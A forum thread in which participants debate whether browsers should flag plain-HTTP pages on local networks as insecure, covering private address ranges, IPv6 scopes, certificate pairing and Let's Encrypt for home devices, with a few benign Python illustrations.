> So, given the limited address range, it was clearly not designed for every person in the world to have an address, not to mention every appliance in your kitchen. The internet has grown rather organically and has adopted a broader use case.
Well, yes, but that wasn't because it was intended to be used with NAT, or anything else that was not a globally routable address for every device, but because it wasn't expected to gain that many users.
> The infrastructure, protocols and best practices used on the internet now reflect this unanticipated use case.
Which is an argument for what exactly? Especially with regards to IPv6 and ULA?
> How it was meant to be used is an artefact that stopped mattering some time in the 80s.
Why would that have stopped then? Again, in particular with regards to IPv6, which does not have the address scarcity that might have justified use of NAT and non-globally routed address space as a temporary workaround?
> The point is that flagging plain http websites as "unsafe" makes a lot of assumptions about my network.
... just as not doing so does? If anything, it would be arbitrary to just exempt certain prefixes from security policies when there is no normative basis for such an exemption. I happen to have only globally routable IPv6 addresses on my LAN, but my LAN is indeed trusted, both wired and WiFi, using distinct /64s. But I also have a guest WiFi that is in the same IPv6 /48, which is not trusted. And I have a VPN link to a customer of mine that uses RFC1918 address space, which is absolutely not trusted.
So, yes, it is "better safe than not safe". But it's exactly the opposite of arbitrary, in that it does not make any assumptions about your network, it provides security no matter what the details of your network, and using the exact same policy for everything. And it's hardly "better safe than sorry", given that this is all a result of being very sorry about all the crap that resulted from lack of security so far.
> They're not necessarily unsafe. In one case, it's on my apartment-wide LAN. In another case, it's connected by ethernet directly to the client. Neither of these are particularly exotic topologies.
Yeah, and how is your browser supposed to know that?
> Why not both?
What both?!
> Agreed? I'm not sure where you got the idea that I think that any of these things should prevent the full use of IP. Certainly not from anything I've said.
The question is not whether it should, but whether it would. Suppose browsers were to implement a policy of "RFC1918 and ULA are considered safe unencrypted and unauthenticated". What would vendors of devices do? I guess we can agree that they would use that policy for config access, as it simplifies the design of their devices, right? Now, that would cover 99%+ of their current user base. Which probably means they won't bother providing an alternative mechanism. Which means (a) you can't use their devices in other setups and (b) their users are locked into such setups, which makes it impossible for, say, router vendors, to build more useful networking products that use the full potential of IP.
> Well, if that were a standardized way to establish trust, that necessarily would lead to vendors adopting it at the cost of suporting other kinds of setups?
So on one hand you believe that supporting one standard will necessarily come at the cost of supporting another (I don't), and you agree that what I suggested might cover 99%+ of the current user base, yet you favor a solution that depends on global addresses, something which definitely doesn't come close to 99% of potential users?
> Also, it is very problematic to overload not globally routable addresses (also often misleadingly called "private addresses") with security semantics.
Well, if you want to be really anal about it you could call them "addresses which fall into one of the address ranges allocated for private use", but you're just splitting hairs.
> While many home setups do have a sort-of security boundaries around RFC1918 subnets, there is absolutely no guarantee that that is the case.
There is no guarantee, but that's different from saying that it's inherently unsafe.
> Which is an argument for what exactly? Especially with regards to IPv6 and ULA?
It's a reflection on how the internet is built. It doesn't matter that in the ideal network, everything might have an address, when pretty much every device is behind some kind of NAT. IPv6? Come back when it's widely adopted.
> Why would that have stopped then? Again, in particular with regards to IPv6, which does not have the address scarcity that might have justified use of NAT and non-globally routed address space as a temporary workaround?
It stopped mattering because of address exhaustion and slow adoption of IPv6. Now, NAT is an integral part of the internet. I'm not trying to justify it or state this as a matter of preference—I'd definitely prefer having a ton of IPv6 addresses over the single IPv4 address I actually have—I'm just laying things out as they are, and how they are for the vast majority of consumers.
> ... just as not doing so does?
No. Flagging a website as "safe" when it can not be established that it is safe is at least as wrong as flagging it as "unsafe" when it can not be established as being unsafe. What I'm suggesting, not flagging it in any particular way at all, would be taking a neutral stance. IMO, the practice of calling HTTPS sites "secure" is itself potentially misleading to consumers. It is only secure in a very specific sense, likely not in the broader sense a layman would consider.
> Yeah, and how is your browser supposed to know that?
The question I stop at is "why is my browser supposed to know that?"
> What both?!
Both a way of verifying and distributing certificates network-wide in a LAN and for those certificates to be usable globally.
> The question is not whether it should, but whether it would. Suppose browsers were to implement a policy of "RFC1918 and ULA are considered safe unencrypted and unauthenticated". What would vendors of devices do?
The premise of my suggestion is that the browsers won't back down from indiscriminately marking plain HTTP sites as insecure, hence "Perhaps a rather drastic change like this will lead to more user friendly ways to install self-signed certificates on home networks."—so suppose they would support such a method. Would that be better or worse than current practice?
> Which probably means they won't bother providing an alternative mechanism. Which means (a) you can't use their devices in other setups and (b) their users are locked into such setups, which makes it impossible for, say, router vendors, to build more useful networking products that use the full potential of IP.
That's a load of conjecture. I'm not sure how to respond except with a bunch of other conjecture, so I'll refrain.
> So on one hand you believe that supporting one standard will necessarily come at the cost of supporting another (I don't),
So, you think vendors who have covered 99%+ of their userbase with a solution will generally also implement an alternative that is way more complicated for the remaining 1%?
> and you agree that what I suggested might cover 99%+ of the current user base, yet you favor a solution that depends on global addresses, something which definitely doesn't come close to 99% of potential users?
No, I favor a solution that does not depend on the global (non-)routability of an address, i.e., a solution that works for 100% of users.
> Well, if you want to be really anal about it you could call them "addresses which fall into one of the address ranges allocated for private use", but you're just splitting hairs.
But that is still equally misleading. There is nothing "private" about those addresses, and in particular nothing "more private" than globally routable addresses. Anyone can use those addresses; all the RFC essentially says is that you won't collide with addresses allocated by RIRs, but they might collide with other administrative domains that choose to use the same prefix. That doesn't mean that you cannot use them on a WAN, or between companies, or really anywhere where you can agree with all participating networks on the allocations. All it means is that you have to expect collisions if you connect previously separate administrative domains, and that you cannot expect your ISP to announce them for you on the public internet, that's it.
Also, just as you can use non-globally routable addresses between networks, you can use globally routable addresses for private networks, and you should if you can (which in practice means when you build an IPv6 network): Even if you build a network that is not intended to be connected to the internet at all, if you do have a globally routable IPv6 prefix allocated for your organization, you should number that network with addresses from that prefix.
> There is no guarantee, but that's different from saying that it's inherently unsafe.
No, it's actually not. "unsafe" does not mean "you will hurt yourself", it means "it has not been established that you won't hurt yourself".
> It's a reflection on how the internet is built. It doesn't matter that in the ideal network, everything might have an address, when pretty much every device is behind some kind of NAT. IPv6? Come back when it's widely adopted.
So, for the question of how to achieve (as close as possible to) an ideal network, it doesn't matter what the ideal network would look like?! Or do you think we should just wait until device vendors have screwed up IPv6 before we try to enforce some sensible policy?
> It stopped mattering because of address exhaustion and slow adoption of IPv6. Now, NAT is an integral part of the internet. I'm not trying to justify it or state this as a matter of preference—I'd definitely prefer having a ton of IPv6 addresses over the single IPv4 address I actually have—I'm just laying things out as they are, and how they are for the vast majority of consumers.
So ... because no one uses IPv6, you suggested to use ULA as an indicator for security?! I am not sure I follow ...
> No. Flagging a website as "safe" when it can not be established that it is safe is at least as wrong as flagging it as "unsafe" when it can not be established as being unsafe.
No, you don't establish "unsafety", that is the default assumption. The only way to establish that something is unsafe is to show after the fact that someone got hurt, which is just completely useless as a security mechanism.
> What I'm suggesting, not flagging it in any particular way at all, would be taking a neutral stance.
Wouldn't a neutral stance be to instead display a security status of "security unknown" (which is obviously equivalent to insecure)? "Not flagging it in any particular way" simply means that the user makes an assumption one way or another, not that the user thinks "it is unknown whether this is secure".
> IMO, the practice of calling HTTPS sites "secure" is itself potentially misleading to consumers. It is only secure in a very specific sense, likely not in the broader sense a layman would consider.
Well, yeah, but that is not really relevant to the question of warning about an insecure situation. Just because there are insecure situations that you cannot warn about does not mean that warning about other insecure situations isn't useful. Really, it makes much more sense to warn about insecure situations (which means situations not known to be secure against certain types of attacks deemed relevant in the respective context) than to display anything that says "this is secure", as security is always relative to specific attacks, not a global property.
> The question I stop at is "why is my browser supposed to know that?"
Because your browser should help you protect your personal data that you process using your browser? I mean, I don't think it should know that, it should just enforce the same encryption requirements everywhere, but you seem to disagree with that because there are networks where your personal data is secure without encryption--in which case, your browser would either have to give up the goal of protecting your personal data, or it would have to know about which parts of your network are secure without encryption.
> Both a way of verifying and distributing certificates network-wide in a LAN and for those certificates to be usable globally.
Well, that would be a pairing mechanism then?! (Which still should not overload global routability with security semantics.)
> The premise of my suggestion is that the browsers won't back down from indiscriminately marking plain HTTP sites as insecure, hence "Perhaps a rather drastic change like this will lead to more user friendly ways to install self-signed certificates on home networks."—so suppose they would support such a method. Would that be better or worse than current practice?
It depends on the mechanism? Yes, centralized certificate management for your own devices would be useful, but it should not in any way overload the routability of addresses. If you want to use the LAN as a semi-trusted key exchange mechanism, that probably should happen at the ethernet layer. Or maybe with a one-hop TTL on the IP layer. You have to detect whether you are on the same LAN, not whether you are using an RFC1918/ULA prefix, because not all LANs use RFC1918/ULA, and not all RFC1918/ULA networks are limited to a LAN, let alone a trusted LAN.
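The "one-hop TTL" idea can be sketched roughly like this. This is a hypothetical helper of my own (a real mechanism would live inside the pairing protocol, not in application code), but it shows the principle: with a TTL of 1, the first router on the path drops the packet, so the connection can only succeed if the peer is on the same link, regardless of what prefix it uses:

```python
import socket

def probe_same_link(host: str, port: int, timeout: float = 1.0) -> bool:
    """Hypothetical sketch: try to reach host with the IP TTL set to 1.

    The first router decrements TTL 1 to 0 and discards the packet, so
    the TCP connection can only complete if host is directly on-link --
    whether or not its address happens to be RFC1918/ULA. (IPv4 only
    here; IPv6 would use IPV6_UNICAST_HOPS instead.)
    """
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.setsockopt(socket.IPPROTO_IP, socket.IP_TTL, 1)
    s.settimeout(timeout)
    try:
        s.connect((host, port))
        return True
    except OSError:
        # Timeout, refusal, or an ICMP "time exceeded" from a router.
        return False
    finally:
        s.close()
```

Note this is still only "same link", not "trusted link"; it just avoids encoding the trust decision into address prefixes.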
> That's a load of conjecture. I'm not sure how to respond except with a bunch of other conjecture, so I'll refrain.
It is mostly an observation of what always happens in such situations.
> So, you think vendors who have covered 99%+ of their userbase with a solution will generally also implement an alternative that is way more complicated for the remaining 1%?
Not necessarily, but the designer of a standard could take both use cases into account.
> No, I favor a solution that does not depend on the global (non-)routability of an address, i.e., a solution that works for 100% of users.
What, more precisely? Of course taking into consideration that 100% of users might not even have an internet connection. One thing I'd like is for devices to have their key signature printed on a sticker. Then I can verify the signature, log in and generate a new key and password, and generate a certificate that I can install myself or sign up with a service like Let's Encrypt.
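That sticker-verification step is easy to picture. A hypothetical sketch (the function names are mine; the fetch deliberately skips chain validation, since the whole point is that no CA is involved yet):

```python
import hashlib
import ssl

def format_fingerprint(der: bytes) -> str:
    """SHA-256 over the DER-encoded certificate, rendered as the
    colon-separated hex pairs a sticker would plausibly carry."""
    digest = hashlib.sha256(der).hexdigest().upper()
    return ":".join(digest[i:i + 2] for i in range(0, len(digest), 2))

def cert_fingerprint(host: str, port: int = 443) -> str:
    # get_server_certificate performs no chain validation unless a CA
    # bundle is passed, which is what we want for a self-signed device.
    pem = ssl.get_server_certificate((host, port))
    return format_fingerprint(ssl.PEM_cert_to_DER_cert(pem))

# The user then compares cert_fingerprint("device.local") against the
# value printed on the device before trusting the key.
```

Once that comparison succeeds, everything downstream (new key, new password, a certificate you install or register) rests on a verification the user actually performed, rather than on which network segment the device happened to sit on.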
> But that is still equally misleading. There is nothing "private" about those addresses, and in particular nothing "more private" than globally routable addresses.
No, it's not misleading to say that they are allocated for private use. Your ISP drops connections to these addresses because they respect RFC1918 and don't route the private address ranges. Even if they didn't, these address ranges are still allocated for private use, and your ISP is Wrong. They're only routable in the sense that IP would technically allow it, but the internet is not simply IP but a collection of standards and best practices.
And sure, "private" has a very broad meaning. A browser could very well flag a certificate that was distributed from a private address as such and let the user decide whether they trust that source.
> Also, just as you can use non-globally routable addresses between networks, you can use globally routable addresses for private networks, and you should if you can (which in practice means when you build an IPv6 network): Even if you build a network that is not intended to be connected to the internet at all, if you do have a globally routable IPv6 prefix allocated for your organization, you should number that network with addresses from that prefix.
Sure. But again, "in practice means when you build an IPv6 network", i.e. not a typical consumer, and for how much longer? In an enterprise there are already many different ways to solve the problem of authentication, certificate signing and encryption. Consider that the average internet user doesn't even have a registered domain name or a static IP allocation.
> No, it's actually not. "unsafe" does not mean "you will hurt yourself", it means "it has not been established that you won't hurt yourself".
So everything on the web should be flagged by the browser as unsafe? I don't know how the browser can ever safely establish that I won't hurt myself. "Unsafe" and "safe" are two sides of a subjective, blurry line, at best a reasonable assumption and at worst an arbitrary handwave.
IMO, the browser is taking what should be exact descriptions of the nature of the connection and watering them down to vague, misleadingly simplified concepts. The browser could tell me that my connection to a site is unencrypted, that it is encrypted with an uncertified key, or that it is encrypted with a certified key, and when you click these it could show a help text describing what that means exactly, the possible consequences of using the service, and details on the key and certificate if applicable. When I click the "Secure" badge in Chrome, I don't even get to see which CA signed it, or a public key.
"Secure" and "Insecure" mean just that: rather impossible things for a browser to verify, and something that a user unfamiliar with the underlying technology may interpret as an authoritative rating of the provider of the service as a whole, when in reality there are many more aspects to take into account in deciding whether a site is secure or insecure.
> So, for the question of how to achieve (as close as possible to) an ideal network, it doesn't matter what the ideal network would look like?!
Well, it involves IPv6, so we can start there. We're talking about a new security policy that a major browser apparently wants to implement soon, certainly much sooner than a full IPv6 rollout.
> Or do you think we should just wait until device vendors have screwed up IPv6 before we try to enforce some sensible policy?
This is a very loaded question, given that we still disagree on whether a solution that works well both for globally routable and NATed devices is possible.
> So ... because noone uses IPv6, you suggested to use ULA as an indicator for security?! I am not sure I follow ...
I never said that no one uses IPv6, so I agree that you don't follow.
> No, you don't establish "unsafety", that is the default assumption. The only way to establish that something is unsafe is to show after the fact that someone got hurt, which is just completely useless as a security mechanism.
Let's say that I see your ladder. It's broken, so I tell you that it's unsafe. Unreasonable assumption? You take it down and bring another ladder. I don't see it, but I tell you it's unsafe. You see it and can clearly say that it isn't. Is it unsafe? Is it reasonable for me to tell you that it is unsafe? "Unsafety" isn't the default assumption that a browser makes (and with regards to plain HTTP in particular still isn't in the version of Chrome I'm using).
> Wouldn't a neutral stance be to instead display a security status of "security unknown" (which is obviously equivalent to insecure)? "Not flagging it in any particular way" simply means that the user makes an assumption one way or another, not that the user thinks "it is unknown whether this is secure".
Maybe that's actually the better option. But no, "security unknown" in that sense is not equivalent to insecure. As one extreme, I could create a network with an Ethernet cable between two off-grid devices that I control in a Faraday cage. On the other end of the extreme, someone could be tapping a cable far away from my computer and figure out what connections I make regardless of encrypted data. Somewhere in between the two extremes, close to the likely, the party that I establish a secure connection to could be sharing our communication with other parties.
> Because your browser should help you protect your personal data that you process using your browser?
We've already established that the browser can't know it, so is the browser a fundamentally flawed concept?
> Well, that would be a pairing mechanism then?! (Which still should not overload global routability with security semantics.)
Yes? The only part you seem to disagree with is the possibility of having a router in a local network (and yes, local networks exist) facilitate and streamline the exchange.
> If you want to use the LAN as a semi-trusted key exchange mechanism, that probably should happen at the ethernet layer.
So again, a perfect application for a router? The router is in a perfect position to verify that I am on its network.
> It is mostly an observation of what always happens in such situations.
Yes, as evident from the absolute lack of overlapping authentication and encryption standards...
> On the other end of the extreme, someone could be tapping a cable far away from my computer and figure out what connections I make regardless of encrypted data. Somewhere in between the two extremes, close to the likely, the party that I establish a secure connection to could be sharing our communication with other parties.
Which is in no way in conflict with saying "this is insecure". That is in conflict with saying "this is secure", because that implies "... against this specific set of threats", which is not understood by the average user. So, yes, I agree, browsers should generally avoid telling users that something "is secure", but it is perfectly fine to say "this is insecure".
> We've already established that the browser can't know it, so is the browser a fundamentally flawed concept?
No, it's just a subjective entity as all entities in the world are, and so it has to determine risks based on incomplete information, as all entities in the world have to. Also, it's not strictly true that it cannot know that, but it cannot know that without you telling it. It might well be possible to have an option where you could tell your browser "this set of addresses is safe to talk to unencrypted and unauthenticated".
> Yes? The only part you seem to disagree with is the possibility of having a router in a local network (and yes, local networks exist) facilitate and streamline the exchange.
No, I disagree primarily with overloading the semantics of "private addresses", and with mechanisms that only allow communication in a local network. "private addresses" is neither reliably indicative of nor a required property of "within the same local network".
But also, a mechanism that does not depend on being on the same local network for pairing would be preferable.
> So again, a perfect application for a router? The router is in a perfect position to verify that I am on its network.
OK ... how?
> Yes, as evident from the absolute lack of overlapping authentication and encryption standards...
... implemented in the same product, where one of them would always have been enough to meet the requirements of 99% of potential users, and the others would have taken considerably more effort to implement?
> Not necessarily, but the designer of a standard could take both use cases into account.
Which doesn't help if it's a separate mechanism. If 1% of the work gets you to the goal in 99% of the cases, that's what vendors will do. Whether that fulfills the requirements of some standard or not does not matter.
> What, more precisely?
I am not making any suggestions as to the solution.
> Of course taking into consideration that 100% of users might not even have an internet connection.
So, if the device is one that does not inherently need global internet connectivity to be useful, then, yeah, things should work without global internet connectivity.
> One thing I'd like is for devices to have their key signature printed on a sticker. Then I can verify the signature, log in and generate a new key and password, generate a certificate that I can install myself or sign up with a service like Let's Encrypt.
Well, a fixed key is a problem, but other than that, yeah, an out-of-band path for key exchange sounds good.
> No, it's not misleading to say that they are allocated for private use. Your ISP drops connections to these addresses because they respect RFC1918 and don't route to the private address ranges. Even if they didn't, these address ranges are still allocated for private use, and your ISP is Wrong. They're only routable in the sense that IP would technically allow it, but the internet is not simply IP but a collection of standards and best practices.
OK, let's get this straight: What does "private" mean? It's a word with a whole lot of only partially overlapping definitions. For the purposes of this discussion, it is important to distinguish the aspect of "independent from official entities" from the aspect of "not revealed to the public", i.e. "providing privacy". RFC1918 addresses are only private in the former sense: You can allocate and use them without coordinating with RIRs or your ISP. However, they have absolutely nothing to do with the latter sense of providing privacy. That is why it is misleading to call them "private addresses": People understand that to mean that they are defined to provide some sort of secrecy or privacy or protection from the public or something along those lines, which they don't. It's not wrong, because there is a different meaning of "private" that fits exactly what RFC1918 are defined to be used for, but it is misleading because it leads people to assume that it encompasses more than that.
Also, whether ISPs do it or not doesn't really matter. What matters is that RFC1918 address space is in fact routed between networks that are not intended to trust each other. And that is perfectly within the uses intended in RFC1918. The RFC isn't concerned with home networks, really, but with "enterprises", and it defines "an enterprise" to be the scope of an RFC1918 allocation. Nowhere does it say that that implies any sort of trust or security relationship between machines within such an allocation. And also, in practice, it is common to link RFC1918 networks of different "enterprises" together, as a sort-of "meta-enterprise", where a trust relationship is even less likely.
The only thing that is "private" about RFC1918 addresses is that you can allocate them without coordination with IANA/RIRs/ISPs, and that you cannot expect an ISP to route them for you on the global internet. There is no privacy specified in the RFC.
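To make the terminology concrete: Python's stdlib `ipaddress` module encodes exactly this allocation-level meaning of "private" (a quick illustration, not part of any RFC):

```python
import ipaddress

# "is_private" only tells you the address comes from a specially allocated
# range (RFC 1918 for IPv4); it says nothing about secrecy, trust, or what
# actually happens to packets sent to it.
for addr in ["10.1.2.3", "172.16.0.1", "192.168.1.1", "8.8.8.8"]:
    ip = ipaddress.ip_address(addr)
    print(f"{addr}: allocated for private use = {ip.is_private}")
```

The flag is purely about the allocation; whether packets to such an address stay within one trust domain is a separate question entirely.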
> And sure, "private" has a very broad meaning. A browser could very well flag a certificate that was distributed from a private address as such and let the user decide whether they trust that source.
How does it matter for this whether the address is "private" (i.e., allocated without coordination with IANA/RIRs/ISPs)?
> Sure. But again, "in practice means when you build an IPv6 network", i.e. not a typical consumer, for how long more?
Erm, most IPv6 use is by consumers, with ~20% adoption based on Google's user measurements?! Not sure whether that's quite "typical" yet, but certainly not unusual either. Most user devices support IPv6, and increasingly, ISPs are rolling out IPv6 to their customers with new subscriptions, which tend to come with new routers, which means that at that point their network is using IPv6 for all services that support it.
> Well, it involves IPv6, we can start there. We're talking about a new security policy that a major browser seems to want to implement shortly, definitely much more shortly than full IPv6 rollout.
Yes, and that is the only way to do it. If you wait until after full IPv6 rollout, you will have to work around assumptions that device vendors by then will have made based on the browser's behaviour, which means it only gets harder to implement. If you want to have any hope of success, you have to act now, when your actions can shape what device vendors will do.
> This is a very loaded question, given that we still disagree on whether a solution that works well both for globally routable and NATed devices is possible.
You have so far failed to even show a solution that works better for NATed devices than non-NATed ones.
> I never said that no one uses IPv6, so I agree that you don't follow.
Replace "no one" with "essentially no one" if you want to get my point.
> Let's say that I see your ladder. It's broken, so I tell you that it's unsafe. Unreasonable assumption? You take it down and bring another ladder. I don't see it, but I tell you it's unsafe. You see it and can clearly say that it isn't. Is it unsafe? Is it reasonable for me to tell you that it is unsafe?
Unsafety is not a(n objective) property of the ladder, it's a (subjective) state of your knowledge. The ladder will only either fail or not (that is an objective fact about the ladder). Even a ladder with partially broken steps might still hold up, and a ladder that is all new and shiny can still have some manufacturing defect that causes it to fail on first use. The former is good to use, the latter is not. But that is a useless concept if your goal is to minimize harm, because you only know it after the fact. So, what we use instead is a concept of "unsafety". Statements about unsafety are an expression of our knowledge about something.

So, the ladder with broken steps is considered unsafe, because based on what we generally know about the statistical properties of ladders with broken steps, they are known to have an increased failure rate. But then, you might apply load tests to that ladder and establish that it does carry the loads required reliably if you avoid the obviously broken steps, in which case it can be considered not unsafe. Mind you, nothing has changed about the ladder; only our knowledge about it has changed. Similarly for the new and shiny ladder: those are generally considered not unsafe because of what we statistically know about new and shiny ladders, and maybe about how ladders are tested after manufacturing. But then, you could test that as well, and maybe find that it breaks apart under light load, at which point you would change to considering it unsafe. Again, nothing has changed about the ladder; it's all about the knowledge you have about it.

And the tests I suggested are not the end of that process of discovering the unsafety of a thing. You might still do other tests yet and come to yet another conclusion (like, I dunno, the testing conditions were unnecessarily harsh, and under more realistic usage conditions the opposite conclusion is appropriate).
Now, not knowing anything about the ladder is just another state of knowledge. And if your goal is to minimize harm, then the default is not to assume safety. Again, that is in no way a statement about the ladder. That does not mean the ladder won't hold up. That only means that the ladder is not known (to you!) to hold up. It is always and exclusively a statement about your knowledge about the ladder.
This is not about answering the question "will the ladder fail?", this is about answering the question "is it known to the best of our understanding that the ladder will not fail under some generally expected load conditions?". If the answer to that is "no", then that is reason to be cautious, and that is why the browser warns you/is going to warn you.
You can of course argue that your goal is not to minimize harm, in which case the default assumption does not apply ... but then the whole discussion is pointless, as you are then essentially just saying "if you don't care about minimizing harm, there is no problem with trusting unencrypted connections (of some sort or another)". True, but not my goal, and obviously also not the goal of those people implementing the change.
> Maybe that's actually the better option. But no, "security unknown" in that sense is not equivalent to insecure. As an extreme, I could create a network with an Ethernet cable between two off-grid devices that I control in a faraday cage.
Yes, you could. But the browser doesn't know that. Therefore, its subjective determination is "this is not known to me to protect your private data", and that is what it is telling you. If you know better, that's fine, but the browser doesn't, so it warns you. If you don't know better, you better should listen to what your browser is telling you if your goal is to minimize harm. If you do know better, why do you care that your browser warns you based on its incomplete knowledge about the world?
A) Scopes aren't a hack; they're part of the protocol.
B) Scopes are exactly: "the global internet and the home".
Considering those things, why should it be absurd if I want to secure my home scope at the application layer too? IPv6 is literally designed to allow for this. Browsers are the ones being stubborn.
If IPv6 is just a terrible collection of hacks, then we need a new version, and fast, before everyone gets stuck on v6 for the next 50 years....
In IPv6 one interface has many addresses. Each one can have:
1. global addresses,
2. rotating temporary global addresses,
3. unique local addresses (ULAs, one for each site), and
4. a link-local address (required).
The first 3 now technically reside in the global scope. ULAs used to be called site-local and had their own scope, but they were restructured to basically be fancy UUIDs and their scope abolished and merged with the global scope. Link-local is still its own scope.
Although both are globally scoped, there's a difference between a global IPv6 address and a ULA. The global address is globally routable, and its prefixes are organized regionally and delegated to allow hierarchical routing, while ULAs have arbitrary prefixes (not suitable for global routing) and are not supposed to be forwarded to interfaces outside their subnet.
So to answer your question, for local communications in your home that you didn't want leaving your network, you would use ULAs. You could use link-local addresses if your home was all on the same l2 link, but the generally preferred solution is to use ULAs so you don't leak protocol details upwards and so you can leverage l3 tunnels.
Local DNS is allowed to respond with ULAs, just not servers participating in the global authoritative DNS. If you want DNS on your home site you simply run a local DNS server that resolves your local names and is configured to forward unknown names to the global DNS.
IPv6 kills NAT, so "scoped" addresses step in to fill the void and are overall a much better solution.
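As a rough illustration of these categories (a sketch using Python's stdlib `ipaddress` module; the sample addresses are arbitrary):

```python
import ipaddress

def classify(addr: str) -> str:
    """Bucket an IPv6 address into the scopes discussed above."""
    ip = ipaddress.IPv6Address(addr)
    if ip.is_link_local:                         # fe80::/10
        return "link-local"
    if ip in ipaddress.IPv6Network("fc00::/7"):  # ULA range (RFC 4193)
        return "unique local (ULA)"
    if ip.is_global:
        return "global"
    return "other"  # e.g. loopback, documentation prefix

print(classify("fe80::1"))               # link-local (required on every interface)
print(classify("fd12:3456:789a::1"))     # unique local (ULA)
print(classify("2606:4700:4700::1111"))  # global
```

Note that the ULA and global cases both sit in what the protocol now calls the global scope; the distinction that matters for routing is the prefix, which is what the check above keys on.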
OK, so? Where exactly do you think are those things specified? Or do you expect me to re-read all IPv6 RFCs only to then repeat those questions because I still don't know where they are specified?
It would require you to run outside services to support it, but you could most certainly rig something together that lets each "installation" claim randomsubdomain.domainyoucontrol.com, phone home with the local network IP of the "installation", phone home the Lets Encrypt DNS-01 details, and then get a valid certificate for a domain that points to the local instance.
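For the DNS-01 part, here is a hedged sketch of the record such a phone-home service would have to publish on behalf of each installation. The domain, token, and thumbprint below are placeholders; per RFC 8555, the TXT value is the base64url-encoded SHA-256 of the key authorization (token plus the account key's JWK thumbprint):

```python
import base64
import hashlib
import secrets

def b64url(data: bytes) -> str:
    """Base64url without padding, as ACME requires."""
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

def dns01_record(domain: str, token: str, account_thumbprint: str) -> tuple[str, str]:
    """Name and value of the TXT record for an ACME DNS-01 challenge."""
    key_authorization = f"{token}.{account_thumbprint}"
    name = f"_acme-challenge.{domain}"
    value = b64url(hashlib.sha256(key_authorization.encode()).digest())
    return name, value

# Each installation claims a random subdomain; the central service publishes
# the TXT record for it (domainyoucontrol.com is illustrative).
subdomain = f"{secrets.token_hex(8)}.domainyoucontrol.com"
name, value = dns01_record(subdomain, "token-from-acme", "account-key-thumbprint")
print(name)
print(value)
```

The resulting A record for the subdomain can then point at the installation's local IP, while the certificate itself is perfectly valid and publicly trusted.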
Interestingly, the German lawyers' association built software that does nearly this, just with a small design change that made it a total flaw:
To communicate out of an HTTPS-secured web mailer to a local IP and port where a security card reader driver would respond, they registered bealocalhost.de, which resolves to 127.0.0.1. To prevent mixed-content errors, they then shipped the private key for an HTTPS certificate for bealocalhost.de compiled into the card reader driver.
Obviously, after someone noticed that, the cert got instantly revoked...
That is like, way way WAY less secure than just using an unencrypted connection, as now my requests are being revealed over DNS to some third party who has the ability to trivially hijack my connections off to the Internet at large.
The owner of domainyoucontrol can simply rebind randomsubdomain and generate a new cert.
There is no way to build a device with HTTPS that allows the user to distrust the maker of the device.
Edit: before I get responses "you can never distrust the maker" — on HTTP I can audit the device, install it, and keep it in the local network forever, trusting it for decades. On HTTPS it needs to be online every 3 months, and the owner could very well intercept it at that time.
Ah, the maker, fair enough. Still, there is, although not for free: the device can let you configure a subdomain of your own domain, and then use LE (with the DNS challenge) to get a cert. That still requires trusting your DNS provider, of course.
It requires internet connection every 3 months, it requires trusting the DNS provider, and it requires having a domain.
It'd be much better if DANE were already supported, as the DHCP server could send you to a DNS resolver returning key info for local IPs, which in turn could use the corresponding certs.
How would that protocol work? I'm not seeing how the DNS resolver would securely get the key info from the device. What if an attacker cloned the device's MAC and said to the resolver "hi, my new key is X"?
Why? The whole point of authentication and encryption is to allow secure communications over insecure networks. So what if DHCP is unencrypted? If you have E2E auth/encryption, all a malicious DHCP server can do is prevent your communications, it can't spy or MITM them.
If you have E2E auth/encryption, all a malicious DHCP server can do is, indirectly, identify every site you connect to, and potentially block you from accessing some sites. Or all. It can intercept all unencrypted stuff. This includes NTP, which in turn means your computer’s clock will be set wrong, which in turn means it can give you long-distrusted certificates whose private keys have leaked.
TL;DR: If you can MitM a system at the root, you can already break basically anything relevant.
Yes, they can block me, but that's just annoying, not insecure. Intercepting unencrypted stuff is the reason for this whole thread. And if they change my computer's date, they might get one malicious cert working - assuming they can change it enough, since NTP has mechanisms for avoiding large leaps - but they'll break every single HTTPS connection besides that one, which I'm sure the user would notice almost immediately.
Meanwhile, routers are generally known to be insecure, and who knows how many viruses my guests bring onto my Wi-Fi network when they ask to connect.
If you control the local DNS server, you can install a certificate for localserver.example.com, then have the server return a local IP for localserver.example.com
It’s not impossible to obtain an SSL certificate for a local connection. You can add an entry for a fictional domain that maps to localhost in your hosts file, and then self-sign a certificate and install it.
but for users of NAS-type devices, we've gone from an easy HTTP web page to change the config to needing to install a custom certificate and change the hosts file...
I sort of have the reverse problem. I would like to use a websocket to connect to an insecure host on the local network from a secure context. I realise that this is incredibly niche and would probably need independent confirmation through the browser to prevent abuse. But it's needed to connect to a local weechat instance from Glowing Bear, which is essentially a web UI for WeeChat, an IRC client: https://github.com/glowing-bear/glowing-bear. Right now we have an https and a non-https-version of the website, which is arguably even worse.
If you have a web service counterpart, you should consider looking into WebRTC... the SDP exchange can happen through your site and then they will connect directly.
That's a valid point, and something like this might be a solution (i.e. serving the client JS from a public site with valid TLS certificate and connecting to the local network from there) -- however, I don't want my application to be dependent on an internet connection. This is something you should be able to run in the literal lonely cabin in the woods.
You could use service workers to aggressively cache the client for offline use. And maybe have an insecure version served from the application as a fallback.
Your problem is isolated to local development servers, which can easily be exempted from blocking non-HTTPS sites. The potential privacy/security gains totally outweigh the inconvenience of seeing "Not Secure" in the URL bar of your browser on an app you are developing.
This isn't as big of a problem as you'd like to believe. IMHO.
Sorry for not being clear enough in my initial post. I'm not talking about a development server. I'm talking about the end product being a server. For example in the form of a user-friendly executable that is natively running on your Windows/Linux/macOS Desktop, a Mobile device, or (alternatively) a single-board computer such as a Raspberry Pi. The end-users using this are not developers. They are just normal users running a simple piece of software that provides them with a web-frontend for a service in their home-network. No internet connection required whatsoever.
So, how do I build an IoT device that never sends a single packet outside of my LAN, which my grandma could have set up and run without ever seeing a security warning, and which does not show "Not Secure"?
In general, how can I get all the functionality e.g. a Nest device may provide, while staying purely within of my LAN?
(Disclaimer: For my own IoT projects, of course I use a special domain with DNS delegation and Let's Encrypt certificates, and HSTS preloaded)
Certificates in which the subject is one or more IP addresses rather than DNS names _are_ a thing, but not many get issued by public CAs, and your laundry list of objections about how you don't want to require any setup or internet connection will almost certainly ensure you wouldn't be able to qualify.
The only way I see to do it the "right way" for the masses is to have the lightbulb phone-home to the manufacturer. It's a little silly, but an IoT lightbulb is silly in the first place.
